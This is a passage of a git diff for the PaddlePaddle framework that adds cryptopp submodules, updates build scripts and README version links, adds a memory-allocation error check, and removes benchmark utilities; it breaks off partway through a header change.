diff --git a/.gitmodules b/.gitmodules
index 8b06f4fb771cbb..0c41450793fc2a 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -110,3 +110,11 @@
 	path = third_party/cccl
 	url = https://github.com/NVIDIA/cccl.git
 	ignore = dirty
+[submodule "third_party/cryptopp"]
+	path = third_party/cryptopp
+	url = https://github.com/weidai11/cryptopp.git
+	ignore = dirty
+[submodule "third_party/cryptopp-cmake"]
+	path = third_party/cryptopp-cmake
+	url = https://github.com/noloader/cryptopp-cmake.git
+	ignore = dirty
diff --git a/README.md b/README.md
index 8f708334ed28f1..001352ea45fc4d 100644
--- a/README.md
+++ b/README.md
@@ -20,7 +20,7 @@ PaddlePaddle is originated from industrial practices with dedication and commitm
 
 ## Installation
 
-### Latest PaddlePaddle Release: [v2.5](https://github.com/PaddlePaddle/Paddle/tree/release/2.5)
+### Latest PaddlePaddle Release: [v2.6](https://github.com/PaddlePaddle/Paddle/tree/release/2.6)
 
 Our vision is to enable deep learning for everyone via PaddlePaddle.
 Please refer to our [release announcement](https://github.com/PaddlePaddle/Paddle/releases) to track the latest features of PaddlePaddle.
diff --git a/README_cn.md b/README_cn.md
index a13fa5ba214503..cd45e4e3ecd2b7 100644
--- a/README_cn.md
+++ b/README_cn.md
@@ -18,9 +18,9 @@
 
 ## 安装
 
-### PaddlePaddle最新版本: [v2.5](https://github.com/PaddlePaddle/Paddle/tree/release/2.5)
+### PaddlePaddle 最新版本: [v2.6](https://github.com/PaddlePaddle/Paddle/tree/release/2.6)
 
-跟进PaddlePaddle最新特性请参考我们的[版本说明](https://github.com/PaddlePaddle/Paddle/releases)
+跟进 PaddlePaddle 最新特性请参考我们的[版本说明](https://github.com/PaddlePaddle/Paddle/releases)
 
 ### 安装最新稳定版本:
 ```
diff --git a/README_ja.md b/README_ja.md
index 22c78a1a79bbd9..dad60eb7ffcf87 100644
--- a/README_ja.md
+++ b/README_ja.md
@@ -20,7 +20,7 @@ PaddlePaddle は、工業化に対するコミットメントを持つ工業的
 
 ## インストール
 
-### PaddlePaddle の最新リリース: [v2.5](https://github.com/PaddlePaddle/Paddle/tree/release/2.5)
+### PaddlePaddle の最新リリース: [v2.6](https://github.com/PaddlePaddle/Paddle/tree/release/2.6)
 
 私たちのビジョンは、PaddlePaddle を通じて、誰もが深層学習を行えるようにすることです。
 PaddlePaddle の最新機能を追跡するために、私たちの[リリースのお知らせ](https://github.com/PaddlePaddle/Paddle/releases)を参照してください。
diff --git a/cmake/external/cryptopp.cmake b/cmake/external/cryptopp.cmake
index 9daa4be7468e42..b3ec8f622923fd 100644
--- a/cmake/external/cryptopp.cmake
+++ b/cmake/external/cryptopp.cmake
@@ -14,12 +14,13 @@
 
 include(ExternalProject)
 
+set(CRYPTOPP_SOURCE_DIR ${PADDLE_SOURCE_DIR}/third_party/cryptopp)
+set(CRYPTOPP_CMAKE_SOURCE_DIR ${PADDLE_SOURCE_DIR}/third_party/cryptopp-cmake)
 set(CRYPTOPP_PREFIX_DIR ${THIRD_PARTY_PATH}/cryptopp)
 set(CRYPTOPP_INSTALL_DIR ${THIRD_PARTY_PATH}/install/cryptopp)
 set(CRYPTOPP_INCLUDE_DIR
     "${CRYPTOPP_INSTALL_DIR}/include"
     CACHE PATH "cryptopp include directory." FORCE)
-set(CRYPTOPP_REPOSITORY ${GIT_URL}/weidai11/cryptopp.git)
 set(CRYPTOPP_TAG CRYPTOPP_8_2_0)
 
 if(WIN32)
@@ -63,17 +64,16 @@ include_directories(${CRYPTOPP_INCLUDE_DIR})
 ExternalProject_Add(
   extern_cryptopp
   ${EXTERNAL_PROJECT_LOG_ARGS} ${SHALLOW_CLONE}
-  GIT_REPOSITORY ${CRYPTOPP_REPOSITORY}
-  GIT_TAG ${CRYPTOPP_TAG}
   PREFIX ${CRYPTOPP_PREFIX_DIR}
+  SOURCE_DIR ${CRYPTOPP_SOURCE_DIR}
   UPDATE_COMMAND ""
   PATCH_COMMAND
-  COMMAND ${CMAKE_COMMAND} -E remove_directory "<SOURCE_DIR>/cmake/"
-  COMMAND git clone ${GIT_URL}/noloader/cryptopp-cmake "<SOURCE_DIR>/cmake"
-  COMMAND cd "<SOURCE_DIR>/cmake" && git checkout tags/${CRYPTOPP_TAG} -b
-          ${CRYPTOPP_TAG}
-  COMMAND ${CMAKE_COMMAND} -E copy_directory "<SOURCE_DIR>/cmake/"
-          "<SOURCE_DIR>/"
+  COMMAND ${CMAKE_COMMAND} -E copy "${CRYPTOPP_CMAKE_SOURCE_DIR}/CMakeLists.txt"
+          "<SOURCE_DIR>/CMakeLists.txt"
+  COMMAND
+    ${CMAKE_COMMAND} -E copy
+    "${CRYPTOPP_CMAKE_SOURCE_DIR}/cryptopp-config.cmake"
+    "<SOURCE_DIR>/cryptopp-config.cmake"
   COMMAND ${CRYPTOPP_PATCH_COMMAND}
   INSTALL_DIR ${CRYPTOPP_INSTALL_DIR}
   CMAKE_ARGS ${CRYPTOPP_CMAKE_ARGS}
diff --git a/cmake/generic.cmake b/cmake/generic.cmake
index 788237cc4699b4..e506f2e3714da5 100644
--- a/cmake/generic.cmake
+++ b/cmake/generic.cmake
@@ -882,12 +882,6 @@ function(hip_library TARGET_NAME)
     cmake_parse_arguments(hip_library "${options}" "${oneValueArgs}"
                           "${multiValueArgs}" ${ARGN})
     if(hip_library_SRCS)
-      # FindHIP.cmake defined hip_add_library, HIP_SOURCE_PROPERTY_FORMAT is requried if no .cu files found
-      if(NOT (${CMAKE_CURRENT_SOURCE_DIR} MATCHES ".*/operators"
-              OR ${CMAKE_CURRENT_SOURCE_DIR} MATCHES ".*/phi/kernels"))
-        set_source_files_properties(${hip_library_SRCS}
-                                    PROPERTIES HIP_SOURCE_PROPERTY_FORMAT 1)
-      endif()
       if(hip_library_SHARED OR hip_library_shared) # build *.so
         hip_add_library(${TARGET_NAME} SHARED ${hip_library_SRCS})
       else()
@@ -901,6 +895,10 @@ function(hip_library TARGET_NAME)
       endif()
       # cpplint code style
       foreach(source_file ${hip_library_SRCS})
+        if(NOT ${source_file} MATCHES "\\.cu$")
+          set_source_files_properties(${source_file}
+                                      PROPERTIES HIP_SOURCE_PROPERTY_FORMAT 1)
+        endif()
         string(REGEX REPLACE "\\.[^.]*$" "" source ${source_file})
         if(EXISTS ${CMAKE_CURRENT_SOURCE_DIR}/${source}.h)
           list(APPEND hip_library_HEADERS
diff --git a/cmake/inference_lib.cmake b/cmake/inference_lib.cmake
index 06dc5d6173794a..517ac24cccc72e 100755
--- a/cmake/inference_lib.cmake
+++ b/cmake/inference_lib.cmake
@@ -237,6 +237,16 @@ copy_part_of_thrid_party(inference_lib_dist ${PADDLE_INFERENCE_INSTALL_DIR})
 
 set(src_dir "${PADDLE_SOURCE_DIR}/paddle/fluid")
 
+if(WIN32)
+  set(paddle_common_lib ${PADDLE_BINARY_DIR}/paddle/common/common.*)
+else()
+  set(paddle_common_lib ${PADDLE_BINARY_DIR}/paddle/common/libcommon.*)
+endif()
+copy(
+  inference_lib_dist
+  SRCS ${paddle_common_lib}
+  DSTS ${PADDLE_INFERENCE_INSTALL_DIR}/paddle/lib)
+
 if(WIN32)
   if(WITH_STATIC_LIB)
     set(paddle_inference_lib
@@ -268,11 +278,6 @@ else()
       SRCS ${paddle_phi_lib}
       DSTS ${PADDLE_INFERENCE_INSTALL_DIR}/paddle/lib)
   endif()
-  set(paddle_common_lib ${PADDLE_BINARY_DIR}/paddle/common/libcommon.*)
-  copy(
-    inference_lib_dist
-    SRCS ${paddle_common_lib}
-    DSTS ${PADDLE_INFERENCE_INSTALL_DIR}/paddle/lib)
 endif()
 
 copy(
diff --git a/paddle/cinn/ir/ir_base.h b/paddle/cinn/ir/ir_base.h
index c333448d029ae0..0047100ebcfdfc 100644
--- a/paddle/cinn/ir/ir_base.h
+++ b/paddle/cinn/ir/ir_base.h
@@ -110,16 +110,23 @@ class Dim;
   macro__(Product)                          \
   macro__(Sum)                              \
   macro__(PrimitiveNode)                    \
-  macro__(IntrinsicOp)                      \
   macro__(_BufferRange_)                    \
   macro__(ScheduleBlock)                    \
   macro__(ScheduleBlockRealize)             \
   macro__(_Dim_)                            \
 
+#define NODETY_CONTROL_OP_FOR_INTRINSIC(macro__) \
+  macro__(IntrinsicOp)                      \
 
 #define NODETY_FORALL(__m)              \
   NODETY_PRIMITIVE_TYPE_FOR_EACH(__m)   \
   NODETY_OP_FOR_EACH(__m)               \
+  NODETY_CONTROL_OP_FOR_INTRINSIC(__m)  \
+  NODETY_CONTROL_OP_FOR_EACH(__m)
+
+#define NODETY_FORALL_EXCEPT_INTRINSIC(__m)              \
+  NODETY_PRIMITIVE_TYPE_FOR_EACH(__m)                    \
+  NODETY_OP_FOR_EACH(__m)                                \
   NODETY_CONTROL_OP_FOR_EACH(__m)
 // clang-format on
 
diff --git a/paddle/cinn/ir/utils/ir_nodes_collector.cc b/paddle/cinn/ir/utils/ir_nodes_collector.cc
index ac2f0317e9213f..e4ebaca653bae9 100644
--- a/paddle/cinn/ir/utils/ir_nodes_collector.cc
+++ b/paddle/cinn/ir/utils/ir_nodes_collector.cc
@@ -15,6 +15,8 @@
 #include "paddle/cinn/ir/utils/ir_nodes_collector.h"
 #include <glog/logging.h>
 
+#include "paddle/cinn/ir/intrinsic_ops.h"
+#include "paddle/cinn/ir/ir.h"
 #include "paddle/cinn/ir/ir_mutator.h"
 #include "paddle/cinn/ir/ir_printer.h"
 
@@ -71,8 +73,71 @@ struct IrNodesCollector : public IRVisitorRequireReImpl<void> {
     }                                  \
   }
 
-  NODETY_FORALL(__m)
+  NODETY_FORALL_EXCEPT_INTRINSIC(__m)
 #undef __m
+
+  void Visit(const ir::IntrinsicOp* op) {
+    switch (op->getKind()) {
+#define __(x)                                     \
+  case ir::IntrinsicKind::k##x:                   \
+    Visit(llvm::dyn_cast<ir::intrinsics::x>(op)); \
+    break;
+
+      INTRINSIC_KIND_FOR_EACH(__)
+#undef __
+    }
+  }
+
+  void Visit(const ir::intrinsics::GetAddr* x) {
+    if (x->data.defined()) {
+      Visit(&(x->data));
+    }
+  }
+
+  void Visit(const ir::intrinsics::BufferGetDataHandle* x) {
+    if (x->buffer.defined()) {
+      Visit(&(x->buffer));
+    }
+  }
+
+  void Visit(const ir::intrinsics::BufferGetDataConstHandle* x) {
+    if (x->buffer.defined()) {
+      Visit(&(x->buffer));
+    }
+  }
+
+  void Visit(const ir::intrinsics::PodValueToX* x) {
+    if (x->pod_value_ptr.defined()) {
+      Visit(&(x->pod_value_ptr));
+    }
+  }
+
+  void Visit(const ir::intrinsics::BufferCreate* x) {
+    if (x->buffer.defined()) {
+      Visit(&(x->buffer));
+    }
+  }
+
+  void Visit(const ir::intrinsics::ArgsConstruct* x) {
+    if (x->var.defined()) {
+      Expr convert = Expr(x->var);
+      Visit(&convert);
+    }
+    for (int i = 0; i < x->args.size(); ++i) {
+      if (x->args[i].defined()) {
+        Visit(&(x->args[i]));
+      }
+    }
+  }
+
+  void Visit(const ir::intrinsics::BuiltinIntrin* x) {
+    for (int i = 0; i < x->args.size(); ++i) {
+      if (x->args[i].defined()) {
+        Visit(&(x->args[i]));
+      }
+    }
+  }
+
   std::set<void*> visited_;
 };
 
diff --git a/paddle/fluid/distributed/common/chunk_allocator.h b/paddle/fluid/distributed/common/chunk_allocator.h
index 17f7bb14224d35..7b19b3a1098398 100644
--- a/paddle/fluid/distributed/common/chunk_allocator.h
+++ b/paddle/fluid/distributed/common/chunk_allocator.h
@@ -14,6 +14,7 @@
 
 #pragma once
 #include <glog/logging.h>
+#include "paddle/fluid/platform/enforce.h"
 
 namespace paddle {
 namespace distributed {
@@ -77,9 +78,16 @@ class ChunkAllocator {
 
   void create_new_chunk() {
     Chunk* chunk;
-    posix_memalign(reinterpret_cast<void**>(&chunk),
-                   std::max<size_t>(sizeof(void*), alignof(Chunk)),
-                   sizeof(Chunk) + sizeof(Node) * _chunk_size);
+    size_t alloc_size = sizeof(Chunk) + sizeof(Node) * _chunk_size;
+    int error = posix_memalign(reinterpret_cast<void**>(&chunk),
+                               std::max<size_t>(sizeof(void*), alignof(Chunk)),
+                               alloc_size);
+    PADDLE_ENFORCE_EQ(error,
+                      0,
+                      paddle::platform::errors::ResourceExhausted(
+                          "Fail to alloc memory of %ld size, error code is %d.",
+                          alloc_size,
+                          error));
     chunk->next = _chunks;
     _chunks = chunk;
 
diff --git a/paddle/fluid/eager/api/manual/eager_manual/forwards/multiply_fwd_func.cc b/paddle/fluid/eager/api/manual/eager_manual/forwards/multiply_fwd_func.cc
index 2bd9213cae610d..47509d025722d8 100644
--- a/paddle/fluid/eager/api/manual/eager_manual/forwards/multiply_fwd_func.cc
+++ b/paddle/fluid/eager/api/manual/eager_manual/forwards/multiply_fwd_func.cc
@@ -61,8 +61,9 @@ paddle::Tensor multiply_ad_func(const paddle::Tensor& x,
   // Type promotion Logic
   if (phi::NeedTypePromotion(x.dtype(), y.dtype())) {
     VLOG(5) << "got different data type, run type protmotion automatically.";
-    LOG(WARNING) << "got different data type, run type protmotion "
-                    "automatically, this may cause data type been changed.";
+    LOG_FIRST_N(WARNING, 1)
+        << "got different data type, run type protmotion "
+           "automatically, this may cause data type been changed.";
     auto op_name = phi::TransToFluidOpName("multiply");
     auto promotion_type = phi::GetPromoteDtype(op_name, x.dtype(), y.dtype());
 
@@ -407,8 +408,9 @@ paddle::Tensor multiply_ad_func(const paddle::Tensor& x,
   // Type promotion Logic
   if (phi::NeedTypePromotion(x.dtype(), y.dtype())) {
     VLOG(5) << "got different data type, run type protmotion automatically.";
-    LOG(WARNING) << "got different data type, run type protmotion "
-                    "automatically, this may cause data type been changed.";
+    LOG_FIRST_N(WARNING, 1)
+        << "got different data type, run type protmotion "
+           "automatically, this may cause data type been changed.";
     auto op_name = phi::TransToFluidOpName("multiply");
     auto promotion_type = phi::GetPromoteDtype(op_name, x.dtype(), y.dtype());
 
diff --git a/paddle/fluid/eager/auto_code_generator/generator/eager_gen.py b/paddle/fluid/eager/auto_code_generator/generator/eager_gen.py
index 2a96fddccbce70..75d6cb94c6b5f2 100644
--- a/paddle/fluid/eager/auto_code_generator/generator/eager_gen.py
+++ b/paddle/fluid/eager/auto_code_generator/generator/eager_gen.py
@@ -528,7 +528,7 @@ class {} : public egr::GradNodeBase {{
 
 TYPE_PROMOTION_LOGIC_TEMPLATE = """   if (phi::NeedTypePromotion({x}.dtype(), {y}.dtype())) {{
     VLOG(5) << "got different data type, run type protmotion automatically.";
-    LOG(WARNING) << "got different data type, run type protmotion automatically, this may cause data type been changed.";
+    LOG_FIRST_N(WARNING, 1) << "got different data type, run type protmotion automatically, this may cause data type been changed.";
     {op_name}
     auto promotion_type = phi::GetPromoteDtype(op_name, {x}.dtype(), {y}.dtype());
 
diff --git a/paddle/fluid/inference/CMakeLists.txt b/paddle/fluid/inference/CMakeLists.txt
index 3f4e7a9344a30c..d2f834a5938e96 100644
--- a/paddle/fluid/inference/CMakeLists.txt
+++ b/paddle/fluid/inference/CMakeLists.txt
@@ -35,7 +35,7 @@ get_property(fluid_modules GLOBAL PROPERTY FLUID_MODULES)
 get_property(phi_modules GLOBAL PROPERTY PHI_MODULES)
 get_property(ir_targets GLOBAL PROPERTY IR_TARGETS)
 get_property(not_infer_modules GLOBAL PROPERTY NOT_INFER_MODULES)
-set(utils_modules pretty_log string_helper benchmark utf8proc)
+set(utils_modules pretty_log string_helper utf8proc)
 
 if(NOT WITH_GFLAGS)
   set(utils_modules ${utils_modules} paddle_flags)
diff --git a/paddle/fluid/inference/api/analysis_config.cc b/paddle/fluid/inference/api/analysis_config.cc
index d9d7d5aa3659ad..9cec6ac6878dc2 100644
--- a/paddle/fluid/inference/api/analysis_config.cc
+++ b/paddle/fluid/inference/api/analysis_config.cc
@@ -180,6 +180,11 @@ void AnalysisConfig::EnableXpu(int l3_size,
                                bool transformer_encoder_adaptive_seqlen,
                                bool enable_multi_stream) {
 #if defined(PADDLE_WITH_XPU) || defined(LITE_SUBGRAPH_WITH_XPU)
+  LOG_FIRST_N(WARNING, 1)
+      << "Parameters in EnableXpu/enable_xpu is deprecated since version "
+         "2.6.1, and will be removed in version 3.0! Please use "
+         "EnableXpu/enable_xpu without parameters, and use "
+         "SetXpuConfig/set_xpu_config to set options.";
   use_xpu_ = true;
   xpu_config_.l3_size = l3_size;
   xpu_config_.conv_autotune_level = conv_autotune;
diff --git a/paddle/fluid/inference/api/paddle_analysis_config.h b/paddle/fluid/inference/api/paddle_analysis_config.h
index 6a3e943dec7e9a..b5a26ff9225aa4 100644
--- a/paddle/fluid/inference/api/paddle_analysis_config.h
+++ b/paddle/fluid/inference/api/paddle_analysis_config.h
@@ -111,6 +111,7 @@ struct PD_INFER_DECL XpuConfig {
   bool conv_autotune_file_writeback{false};
 
   // Fc autotune level. The Optional values are 0-9. Default 0 means no
+  // autotune.
   int fc_autotune_level{0};
   // Base fc autotune info is read from fc_autotune_file.
   std::string fc_autotune_file;
@@ -367,7 +368,7 @@ struct PD_INFER_DECL AnalysisConfig {
   ///
   void EnableXpu(int l3_size = 0xfffc00,
                  bool l3_locked = false,
-                 bool conv_autotune = true,
+                 bool conv_autotune = false,
                  const std::string& conv_autotune_file = "",
                  const std::string& transformer_encoder_precision = "int16",
                  bool transformer_encoder_adaptive_seqlen = false,
diff --git a/paddle/fluid/inference/tensorrt/op_teller.cc b/paddle/fluid/inference/tensorrt/op_teller.cc
old mode 100755
new mode 100644
index 8cf589541b1e04..10763eb911543a
--- a/paddle/fluid/inference/tensorrt/op_teller.cc
+++ b/paddle/fluid/inference/tensorrt/op_teller.cc
@@ -47,6 +47,7 @@ struct SimpleOpTypeSetTeller : public Teller {
 #endif
 #if IS_TRT_VERSION_GE(7000)
     teller_set.insert("tile");
+    int8_teller_set.insert("tile");
     teller_set.insert("flatten_contiguous_range");
     int8_teller_set.insert("flatten_contiguous_range");
     teller_set.insert("rnn");
@@ -2302,15 +2303,20 @@ struct SimpleOpTypeSetTeller : public Teller {
       if (!with_dynamic_shape) {
         if (tile_inputs.find("repeat_times_tensor") != tile_inputs.end()) {
           if (!desc.Input("repeat_times_tensor").empty()) {
+            VLOG(3) << "Tile op: repeat_times_tensor is not empty.";
             return false;
           }
         }
         if (tile_inputs.find("RepeatTimes") != tile_inputs.end()) {
           if (!desc.Input("RepeatTimes").empty()) {
+            VLOG(3) << "Tile op: RepeatTimes is not empty.";
             return false;
           }
         }
-        if (!desc.HasAttr("repeat_times")) return false;
+        if (!desc.HasAttr("repeat_times")) {
+          VLOG(3) << "Tile op:`repeat_times` is not set.";
+          return false;
+        }
       }
     }
 #endif
diff --git a/paddle/fluid/inference/utils/CMakeLists.txt b/paddle/fluid/inference/utils/CMakeLists.txt
index 3dbc06bfc11b7e..0ad2cb0e3f0c84 100644
--- a/paddle/fluid/inference/utils/CMakeLists.txt
+++ b/paddle/fluid/inference/utils/CMakeLists.txt
@@ -1,8 +1,3 @@
-cc_library(
-  benchmark
-  SRCS benchmark.cc
-  DEPS enforce common)
-paddle_test(test_benchmark SRCS benchmark_tester.cc DEPS benchmark)
 cc_library(
   infer_io_utils
   SRCS io_utils.cc
@@ -13,13 +8,5 @@ cc_library(
   DEPS proto_desc enforce common)
 
 cc_library(table_printer SRCS table_printer.cc)
-paddle_test(test_table_printer SRCS table_printer_tester.cc)
 
 proto_library(shape_range_info_proto SRCS shape_range_info.proto)
-
-if(WITH_ONNXRUNTIME AND WIN32)
-  # Copy onnxruntime for some c++ test in Windows, since the test will
-  # be build only in CI, so suppose the generator in Windows is Ninja.
-  copy_onnx(test_benchmark)
-  copy_onnx(test_table_printer)
-endif()
diff --git a/paddle/fluid/inference/utils/benchmark.cc b/paddle/fluid/inference/utils/benchmark.cc
deleted file mode 100644
index 24bc99ed183fad..00000000000000
--- a/paddle/fluid/inference/utils/benchmark.cc
+++ /dev/null
@@ -1,54 +0,0 @@
-// Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-//     http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-
-#include "paddle/fluid/inference/utils/benchmark.h"
-
-#include <fstream>
-
-#include "paddle/fluid/platform/enforce.h"
-
-namespace paddle {
-namespace inference {
-
-std::string Benchmark::SerializeToString() const {
-  std::stringstream ss;
-  ss << "-----------------------------------------------------\n";
-  ss << "name\t";
-  ss << "batch_size\t";
-  ss << "num_threads\t";
-  ss << "latency\t";
-  ss << "qps";
-  ss << '\n';
-
-  ss << name_ << "\t";
-  ss << batch_size_ << "\t\t";
-  ss << num_threads_ << "\t";
-  ss << latency_ << "\t";
-  ss << 1000.0 / latency_;
-  ss << '\n';
-  return ss.str();
-}
-void Benchmark::PersistToFile(const std::string &path) const {
-  std::ofstream file(path, std::ios::app);
-  PADDLE_ENFORCE_EQ(
-      file.is_open(),
-      true,
-      platform::errors::Unavailable("Can not open %s to add benchmark.", path));
-  file << SerializeToString();
-  file.flush();
-  file.close();
-}
-
-}  // namespace inference
-}  // namespace paddle
diff --git a/paddle/fluid/inference/utils/benchmark.h b/paddle/fluid/inference/utils/benchmark.h
deleted file mode 100644
index 56789843c3728e..00000000000000
--- a/paddle/fluid/inference/utils/benchmark.h
+++ /dev/null
@@ -1,56 +0,0 @@
-// Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-//     http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-
-#pragma once
-#include <fstream>
-#include <iostream>
-#include <string>
-
-#include "paddle/utils/test_macros.h"
-
-namespace paddle {
-namespace inference {
-
-/*
- * Helper class to calculate the performance.
- */
-struct TEST_API Benchmark {
-  int batch_size() const { return batch_size_; }
-  void SetBatchSize(int x) { batch_size_ = x; }
-
-  int num_threads() const { return num_threads_; }
-  void SetNumThreads(int x) { num_threads_ = x; }
-
-  bool use_gpu() const { return use_gpu_; }
-  void SetUseGpu() { use_gpu_ = true; }
-
-  float latency() const { return latency_; }
-  void SetLatency(float x) { latency_ = x; }
-
-  const std::string& name() const { return name_; }
-  void SetName(const std::string& name) { name_ = name; }
-
-  std::string SerializeToString() const;
-  void PersistToFile(const std::string& path) const;
-
- private:
-  bool use_gpu_{false};
-  int batch_size_{0};
-  float latency_;
-  int num_threads_{1};
-  std::string name_;
-};
-
-}  // namespace inference
-}  // namespace paddle
diff --git a/paddle/fluid/inference/utils/benchmark_tester.cc b/paddle/fluid/inference/utils/benchmark_tester.cc
deleted file mode 100644
index 8f7614cb10a44e..00000000000000
--- a/paddle/fluid/inference/utils/benchmark_tester.cc
+++ /dev/null
@@ -1,40 +0,0 @@
-// Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-//     http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-
-#include <glog/logging.h>
-#include <gtest/gtest.h>
-
-#include "paddle/fluid/inference/utils/benchmark.h"
-
-using namespace paddle::inference;  // NOLINT
-TEST(Benchmark, basic) {
-  Benchmark benchmark;
-  benchmark.SetName("key0");
-  benchmark.SetBatchSize(10);
-  benchmark.SetUseGpu();
-  benchmark.SetLatency(220);
-  LOG(INFO) << "benchmark:\n" << benchmark.SerializeToString();
-}
-
-TEST(Benchmark, PersistToFile) {
-  Benchmark benchmark;
-  benchmark.SetName("key0");
-  benchmark.SetBatchSize(10);
-  benchmark.SetUseGpu();
-  benchmark.SetLatency(220);
-
-  benchmark.PersistToFile("1.log");
-  benchmark.PersistToFile("2.log");
-  benchmark.PersistToFile("3.log");
-}
diff --git a/paddle/fluid/inference/utils/table_printer_tester.cc b/paddle/fluid/inference/utils/table_printer_tester.cc
deleted file mode 100644
index fc482807b2854c..00000000000000
--- a/paddle/fluid/inference/utils/table_printer_tester.cc
+++ /dev/null
@@ -1,82 +0,0 @@
-// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-//     http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-
-#include <glog/logging.h>
-#include <gtest/gtest.h>
-
-#include "paddle/fluid/inference/utils/table_printer.h"
-
-namespace paddle {
-namespace inference {}  // namespace inference
-}  // namespace paddle
-
-TEST(table_printer, output) {
-  std::vector<std::string> header{"config", "value"};
-  paddle::inference::TablePrinter table(header);
-
-  // model_dir
-  table.InsertRow({"model_dir", "./model_dir"});
-  // model
-  table.InsertRow({"model_file", "./model.pdmodel"});
-  table.InsertRow({"params_file", "./model.pdiparams"});
-
-  table.InsetDivider();
-  // gpu
-  table.InsertRow({"use_gpu", "true"});
-  table.InsertRow({"gpu_device_id", "0"});
-  table.InsertRow({"memory_pool_init_size", "100MB"});
-  table.InsertRow({"thread_local_stream", "false"});
-  table.InsetDivider();
-
-  // trt precision
-  table.InsertRow({"use_trt", "true"});
-  table.InsertRow({"trt_precision", "fp32"});
-  table.InsertRow({"enable_dynamic_shape", "true"});
-  table.InsertRow({"DisableTensorRtOPs", "{}"});
-  table.InsertRow({"EnableVarseqlen", "ON"});
-  table.InsertRow({"tensorrt_dla_enabled", "ON"});
-  table.InsetDivider();
-
-  // lite
-  table.InsertRow({"use_lite", "ON"});
-  table.InsetDivider();
-
-  // xpu
-  table.InsertRow({"use_xpu", "true"});
-  table.InsertRow({"xpu_device_id", "0"});
-  table.InsetDivider();
-
-  // ir
-  table.InsertRow({"ir_optim", "true"});
-  table.InsertRow({"ir_debug", "false"});
-  table.InsertRow({"enable_memory_optim", "false"});
-  table.InsertRow({"EnableProfile", "false"});
-  table.InsertRow({"glog_info_disabled", "false"});
-  table.InsetDivider();
-
-  // cpu
-  table.InsertRow({"CpuMathLibrary", "4"});
-  // mkldnn
-  table.InsertRow({"enable_mkldnn", "false"});
-  table.InsertRow({"mkldnn_cache_capacity", "10"});
-
-  // a long string
-  table.InsertRow(
-      {"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ a long string "
-       "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~",
-       "------------------------------------------ a long value "
-       "-----------------------------------------------------"});
-
-  LOG(INFO) << table.PrintTable();
-}
diff --git a/paddle/fluid/operators/set_value_op.cc b/paddle/fluid/operators/set_value_op.cc
index 16864b80b5c765..a0aa1f589191ff 100644
--- a/paddle/fluid/operators/set_value_op.cc
+++ b/paddle/fluid/operators/set_value_op.cc
@@ -151,32 +151,26 @@ class SetValueGradMaker : public framework::SingleGradOpMaker<T> {
 
  protected:
   void Apply(GradOpPtr<T> op) const override {
-    if (this->HasInput("ValueTensor")) {
-      op->SetType("set_value_grad");
-
-      op->SetInput(framework::GradVarName("Out"), this->OutputGrad("Out"));
-      op->SetInput("ValueTensor", this->Input("ValueTensor"));
-      if (this->HasInput("StartsTensorList")) {
-        op->SetInput("StartsTensorList", this->Input("StartsTensorList"));
-      }
-      if (this->HasInput("EndsTensorList")) {
-        op->SetInput("EndsTensorList", this->Input("EndsTensorList"));
-      }
-      if (this->HasInput("StepsTensorList")) {
-        op->SetInput("StepsTensorList", this->Input("StepsTensorList"));
-      }
-
-      op->SetAttrMap(this->Attrs());
-
-      op->SetOutput(framework::GradVarName("ValueTensor"),
-                    this->InputGrad("ValueTensor"));
-      op->SetOutput(framework::GradVarName("Input"), this->InputGrad("Input"));
-
-    } else {
-      op->SetType("assign");
-      op->SetInput("X", this->OutputGrad("Out"));
-      op->SetOutput("Out", this->InputGrad("Input"));
+    op->SetType("set_value_grad");
+    op->SetInput("ValueTensor", this->Input("ValueTensor"));
+    op->SetOutput(framework::GradVarName("ValueTensor"),
+                  this->InputGrad("ValueTensor"));
+
+    op->SetInput(framework::GradVarName("Out"), this->OutputGrad("Out"));
+
+    if (this->HasInput("StartsTensorList")) {
+      op->SetInput("StartsTensorList", this->Input("StartsTensorList"));
+    }
+    if (this->HasInput("EndsTensorList")) {
+      op->SetInput("EndsTensorList", this->Input("EndsTensorList"));
     }
+    if (this->HasInput("StepsTensorList")) {
+      op->SetInput("StepsTensorList", this->Input("StepsTensorList"));
+    }
+
+    op->SetAttrMap(this->Attrs());
+
+    op->SetOutput(framework::GradVarName("Input"), this->InputGrad("Input"));
   }
 };
 
diff --git a/paddle/fluid/primitive/composite/composite.h b/paddle/fluid/primitive/composite/composite.h
index a35095c98d4a29..66f17168ec01a5 100644
--- a/paddle/fluid/primitive/composite/composite.h
+++ b/paddle/fluid/primitive/composite/composite.h
@@ -22,6 +22,9 @@ namespace paddle {
 namespace primitive {
 namespace details {
 
+// empty_shape means x.shape=[]
